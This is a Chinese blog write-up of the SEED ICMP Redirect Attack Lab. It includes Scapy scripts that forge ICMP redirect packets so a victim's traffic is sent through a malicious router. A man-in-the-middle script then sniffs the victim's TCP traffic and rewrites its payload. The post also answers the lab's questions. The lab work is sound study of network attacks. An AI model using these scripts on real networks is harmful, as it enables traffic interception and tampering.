ICMP Redirect Attack Lab(SEED实验)

最新推荐文章于 2023-08-23 12:48:45 发布
最新推荐文章于 2023-08-23 12:48:45 发布
阅读量2.5k 收藏 8
点赞数 1
分类专栏: 网安 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l4kjih3gfe2dcba1/article/details/126522905
版权

ICMP Redirect Attack Lab(SEED实验)

ICMP重连就是我们伪装的路由器通过报文告诉受害者,发向某个方向的报文不应发给另一个路由器,而应该发给我们,并以此截获受害者的报文,实现MITM

环境配置

在这里插入图片描述

Task 1 发起ICMP重连

在目前的Ubuntu系统中已经默认拒绝了ICMP报文的接收,用以防范这种重连攻击。为了复现攻击方式,实验设置已经替我们打开了受害者主机的接收功能:
在这里插入图片描述
但同时,受害者主机也已经配置了192.168.60.0/24的报文发送方向,并不是我们的伪装路由。我们当前的工作就是告诉受害者他的方向错误了。
ICMP报文类型参考,这里应该选择type = 5, code = 0
实验手册提供了一个ICMP_redirect报文骨架,对其进行修改后的执行代码:

#!/usr/bin/python3
from scapy.all import *

Ma_IP = '10.9.0.111'
Router_IP = '10.9.0.11'
Victim_IP = '10.9.0.5'
Network_IP = '192.168.60.5'

ip = IP(src = Router_IP , dst = Victim_IP )
icmp = ICMP(type=5, code=1)# type 5 code 0 for redirect host
icmp.gw = Ma_IP 
# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = Victim_IP , dst = Network_IP )
send(ip/icmp/ip2/ICMP());

根据实验手册的说法,这种攻击在平时是可以直接成功的,但是本实验提供的容器中受害者会对这种重连报文进行检查,当且仅当受害者正在向目标发送ICMP时收到这种攻击报文时才能成功。
在这里插入图片描述

Question 1.2.3

• Question 1: Can you use ICMP redirect attacks to redirect to a remote machine? Namely, the IP address assigned to icmp.gw is a computer not on the local LAN. Please show your experiment result, and explain your observation.

不能。发生ICMP重定向通常有两种情况:
1)当路由器从某个接口收到数据还需要从相同接口转发该数据时;
2)当路由器从某个接口到发往远程网络的数据时发现源ip地址与下一跳属于同一网段时。
这两个条件都要求重定向的地址与自身处于同一个LAN下。如果将重定向的网关指向不在同一个LAN下的地址(例如8.8.8.8),则不会被写入到受害者的缓存中。(由于并未被写入,所以不展示截图)

• Question 2: Can you use ICMP redirect attacks to redirect to a non-existing machine on the same network? Namely, the IP address assigned to icmp.gw is a local computer that is either offline or non-existing. Please show your experiment result, and explain your observation.

不能。我尝试将受害者报文导向一个不存在的网址10.9.0.10,出现了如图:
在这里插入图片描述
如图可以发现,当收到重连后,受害者会通过ARP寻找目标网址的MAC地址,并同时先维持原先的连接。但由于并没有找到目标网址的MAC地址,所以维持原来的发送。
在实验过程中尝试将报文导向10.9.0.105,发现其没有打开IP转发,所以会给受害者发送重定向报文。如图:
在这里插入图片描述

同时这里可以与上一问,以及同为SEED时间的ARP中毒实验进行联想:可以欺骗存在一个不存在的网址告诉给受害者,并将报文导向攻击者的主机,同时隐藏攻击者的真实IP地址。

• Question 3: If you look at the docker-compose.yml file, you will find the following entries for the malicious router container. What are the purposes of these entries? Please change their value to 1, and launch the attack again. Please describe and explain your observation.

如图,以及我在上一问中得到的测试结果,我们的恶意路由自行发送了重定向报文:
在这里插入图片描述

Task 2 MITM

MITM代码:

#!/usr/bin/env python3
from scapy.all import *

VIC_MAC='02:42:0a:09:00:05'

def spoof_pkt(pkt):
	newpkt = IP(bytes(pkt[IP]))
	del(newpkt.chksum)
	del(newpkt[TCP].payload)
	del(newpkt[TCP].chksum)
	print("Get a pkt!!!")
	if pkt[TCP].payload:
		data = pkt[TCP].payload.load
		print("*** %s, length: %d" % (data, len(data)))
		# Replace a pattern
		newdata = data.replace(b'seedlabs', b'AAAAAAAA')
		send(newpkt/newdata)
	else:
		send(newpkt)
	
f = f'tcp and (ether src {VIC_MAC})'
#f = 'tcp'
pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)

要想实现本次MITM,则需要将恶意路由的IP转发功能关闭,同时填写正确的过滤器(上述代码已改):

# sysctl net.ipv4.ip_forward=0

在受害者主机发送:
在这里插入图片描述
在目标主机上接收:
在这里插入图片描述
在恶意路由上查看收到的原数据(未被替换):
在这里插入图片描述

Question 4.5

• Question 4: In your MITM program, you only need to capture the traffics in one direction. Please indicate which direction, and explain why.

因为我们只向受害者主机诱导了发报方向,只有受害者会向恶意路由发报,而并未向目标主机进行诱导,所以并不需要制定针对反方向的报文(可以,但没必要)。

• Question 5: In the MITM program, when you capture the nc traffics from A (10.9.0.5), you can use A’s IP address or MAC address in the filter. One of the choices is not good and is going to create issues, even though both choices may work. Please try both, and use your experiment results to show which choice is the correct one, and please explain your conclusion.

应该使用MAC地址进行过滤,因为使用IP会造成转发风暴。展示风暴截图:
在这里插入图片描述

总结

本篇实验比较简单,所以并无重点总结。
需要注意的是,这种改写与之前的ARP实验相同,缓存内容会被定时刷新,因此应当写有自动化程序代以实施。
但是本次实验中由于作者也提出了的容器原因,当且仅当受害者执行ping时才能进行转向,因此本实验验证的攻击方式真正的可行性与适用性还应在真实环境下重新验证。再加上本实验的漏洞已经被各大系统所弥补(参见Task 1首部中sysctl的设置),所以这种攻击的可行性并不高。

winnower-sliff
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
基于ICMP的隐蔽传输/隐蔽通信代码(包含实验报告+完整说明)可直接运行
05-11
使用Python编写的,基于ICMP隐蔽传输的实验代码,包含第三方依赖库以及详细的配置过程,包含详细的实验报告,有创新点,可实现Windows到Windows、Windows到Ubuntu间的隐蔽通信。也可在本地单独测试。
SEED Labs 2.0】ICMP Redirect Attack Lab
Chenyang的博客
08-27 6128
本文为 SEED Labs 2.0 - ICMP Redirect Attack Lab实验记录。本实验较为简单。
网络协议TCP/IP实验ICMP 协议分析实验
01-09
湘潭大学网络协议TCP/IP实验ICMP 协议分析实验报告,仅供参考
wireshark抓包实验ICMP
10-24
计算机网络wireshark抓包实验ICMP实验内容有下: 1.What is the IP address of your host? What is the IP address of the destination host? 2. Why is it that an ICMP packet does not have source and destination port numbers? 3.Examine one of the ping request packets sent by your host. What are the 3.ICMP type and code numbers? What other fields does this ICMP packet have? How many bytes are the checksum, sequence number and identifier fields?
IP协议ICMP协议分析实验报告
11-30
(1) 学会使用ping的重要参数。 (2) 通过使用协议分析软件掌握IP协议的工作过程。 (3) 通过使用协议分析软件掌握ICMP协议的工作过程 2. 实验环境 PC机两台,交换机一台。两台计算机的IP地址分别为192.168.0.204和192.168.0.22,协议分析软件。 3. 实验原理 (1) IP协议是因特网上最重要的网络层协议,是TCP/IP网络层的核心协议。由IP协议实现的是面向无连接的数据报服务。IP协议包括Ipv4和Ipv6两个版本,IPv4包括20字节的固定手部及可变长的可选首部。 (2) 利用ping检查网络是否能够连通,可以帮助我们分析判断网络故障。该命令只有在安装了TCP/IP协议后才可以使用。Ping命令的主要作用是通过发送数据包并接收应答信息来检测两台计算机之间的网络是否连通。 (3) ICMP属于网络层协议,主要用于在主机与路由器之间传递控制信息,主要的用途是差错报告。Ping命令使用的ICMP协议中的回送请求和回送响应,所以可以使用协议分析软件通过使用ping命令来抓包,分析IP协议和ICMP协议的工作过程。 4. 实验步骤 (1) 打开192.168.0.204主机的命令行,打开抓包软件wireshark开始抓包start,在dos下输入ping 192.168.0.22 –l 3000
网络协议攻防实验ICMP重定向攻击和防御
Ho1aAs‘s Blog
07-26 3649
前言 靶机:seedubuntu 12.01,IP:192.168.199.136 攻击机:Kali-2020.4,IP:192.168.199.129 工具:netwox 原理 ICMP路由重定向攻击(ICMP Redirect Attack)是指攻击者伪装成路由器发送虚假的ICMP路由路径控制报文,使得受害主机选择攻击者指定的路由路径,从而进行嗅探或假冒攻击的一种技术。 ICMP重定向攻击 确认靶机seedubuntu的路由表 route -C -n 可以看到都正确指向了网关192.168.199
SeedLab4: IP/ICMP Attacks Lab
Rachel_IS的博客
01-19 2600
这个Lab的步骤写得非常清晰了,点赞~ IP分片机制 & 攻击 ICMP重定向攻击 反向路径过滤 & 保护 Task 1 Task 1A 没啥花样,先抄代码发三个IP分片 后两个改偏移即可 最后一个flag要设置为0 目的主机抓包,可以看到收到一个数据包的全部分片后,就会拼接成完整的UDP数据包啦 Task 1B 以前课上教过的,IP分片攻击(Teardrop 不过现在系统都优化了,已经比较少了 1 先要求前两个分片部分重叠,这里K=8 具体原理就是当 IP 分片的偏移量
计算机安全_Lab 3_Attacks on TCP/IP Protocols
Yue的小部落格
05-13 3326
目录 1 实验描述 2 实验准备 3 实验内容 3.1 task 1 :ARP cache poisoning 3.2 task 2 :ICMP Redirect Attack. 3.3 task 3 :SYN Flooding Attack. 3.4 task 4 :TCP RST Attacks on telnet and ssh Connections 3.5 task 5 ...
优化网络传输效率的秘密武器——ICMP Redirect揭秘!
最新发布
m0_72410588的博客
08-23 272
ICMP Redirect是一种由路由器生成并发送给主机的控制消息。其作用是告知主机发送数据包时选择更优路径,以提高网络性能和优化数据传输。当路由器接收到一个数据包,发现有更短的路径可以到达目标地址时,它会发送ICMP Redirect消息给发送方主机,告知其修改路由表,选择更优的下一跳路由路径。
经典命令行
热门推荐
ncnynl的专栏
09-09 1万+
Windows 2k/2003 Server 1.最基本,最常用的,测试物理网络的 ping 192.168.10.88 -t ,参数-t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98:winipcfg B.Win2000以上:Ipconfig/all C.NSLOOKUP:如查看河北的DNS C:/>nslookup Default Server: ns.hesjp
ICMP.Ping.zip_Go_ Go_ Go!_icmp attack
09-14
icmp attack source code downlaod source go ,
实验3、ICMP协议解码详解实验.pdf
12-09
ICMP协议是一种面向无连接的协议,用于传输出错报告控制信息。它是一个非常重要的协议,它对于网络安全具有极其重要的意义。它属于网络层协议,主要用于在主机与路由器之间传递控制信息,包括报告错误、交换受限控制和状态信息等。当遇到IP数据无法访问目标、IP路由器无法按当前的传输速率转发数据包等情况时,会自动发送ICMP消息。 ICMP 是 TCP/IP 模型中网络层的重要成员,与 IP 协议、ARP 协议、RARP 协议及 IGMP 协议共同构成 TCP/IP 模型中的网络层。ping 和 tracert是两个常用网络管理命令,ping 用来测试网络可达性,tracert 用来显示到达目的主
tcpip实验指导书
05-26
这是一份TCPIP的实验指导书
漏洞挖掘——实验10 Return-to-libc Attack Lab
一半西瓜的博客
04-17 3751
题目 Lab Return-to-libc Attack Lab Pre 1、名词解释:ARP cache poisoning,ICMP Redirect Attack,SYN Flooding Attack,TCP Session Hijacking。如果想监听局域网内另外一台机器,一般先要进行什么步骤? 2、阅读下面这篇文章并且了解Netwox/Netwag的基本操作: Netwox...
网络层IP编制( 1、IP地址类型 2、IP地址计算 3、特殊IP地址 6、IPV4 VS IPV6 7、为什么要划分子网 8、ICMP协议 10、ICMP重定向)
qq_53235556的博客
09-18 287
255.255.255.255全网广 播地址,代表任意网段的所有主机。172.16.1.255/24子网广 播地址,代表网段上的所有主机。3、去往目的地址的路由的下一跳地址和该报文的源地址在同一个网段。2、去往目的地址的路由的出口和收到该报文入口是同一个接口。4、该报文的源地址也要和路由器的接口地址在同一个网段。都是受限的广播地址,不会被路由器转发到其他接口。●一个B类地址用于一 个广 播域,地址浪费。可分配给网络中的节点或网络设备接口的地址。1、路由拥有去往目的地址的路由。(n主机部分的比特位数)
Attacks on TCP/IP Protocols (Task2) ICMP Redirect Attack
我有一颗五角星
04-29 2021
Task2:  ICMP Redirect Attack
icmp重定向攻击实验
bunner_的博客
12-27 2867
使用netwox测验 实验环境: 攻击机:kali linux 192.168.181.129 靶机:ubuntu20.04 192.168.181.131 默认网关:192.168.181.2 1、安装必要工具 # 安装 ifconfig 等网络命令 $ sudo apt-get install net-tools # 安装 traceroute $ sudo apt-get install traceroute # 安装 netwox 工具, 攻击机需要 $ sudo apt-get install
ICMP重定向攻击
honest_gg的博客
12-20 2167
实验工具: ENSP(搭建拓扑) VM虚拟机(kali、win7) 1.环境配置 ENSP: 1.1 使用设备 1.2 ENSP设备配置 Kali(v8网卡) win7(v1网卡) 路由器配置 路由器配置查询 服务器配置 VM虚拟机: 1.3 VM虚拟机配置(kali、win7) ——具体IP,子网,网关配置方法如实验四一样 目的:让kali、win7可以通...
Secret-Key Encryption Lab网安实验
l4kjih3gfe2dcba1的博客
07-30 8776
Secret-Key Encryption Lab网安实验 实验站点 文章目录Secret-Key Encryption Lab网安实验Task 1: Frequency Analysis Against Monoalphabetic Substitution CipherTask 2: Encryption using Different Ciphers and ModesTask 3: Encryption Mode – ECB vs. CBC-aes-128-ecb-aes-128-cbcTask 4
ICMP重定向攻击实验
05-02
ICMP重定向攻击是一种网络攻击,攻击者通过向受害者发送伪造的ICMP重定向消息,欺骗受害者将数据包发送到错误的下一跳路由器,从而达到劫持流量的目的。 以下是ICMP重定向攻击的实验步骤: 1. 准备两台计算机,一台作为攻击者,一台作为受害者。 2. 在攻击者计算机上使用工具如hping3或Scapy发送伪造的ICMP重定向消息。攻击者需要知道受害者计算机上的网关地址,以便伪造ICMP重定向消息。 3. 在受害者计算机上运行网络抓包工具如Wireshark或tcpdump,以便捕获ICMP重定向消息和受害者发送的数据包。 4. 发送数据包到攻击者计算机,观察数据包是否被攻击者成功劫持。 注意:ICMP重定向攻击是非法的,您应该在合法的环境下进行实验,以避免违反法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

winnower-sliff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值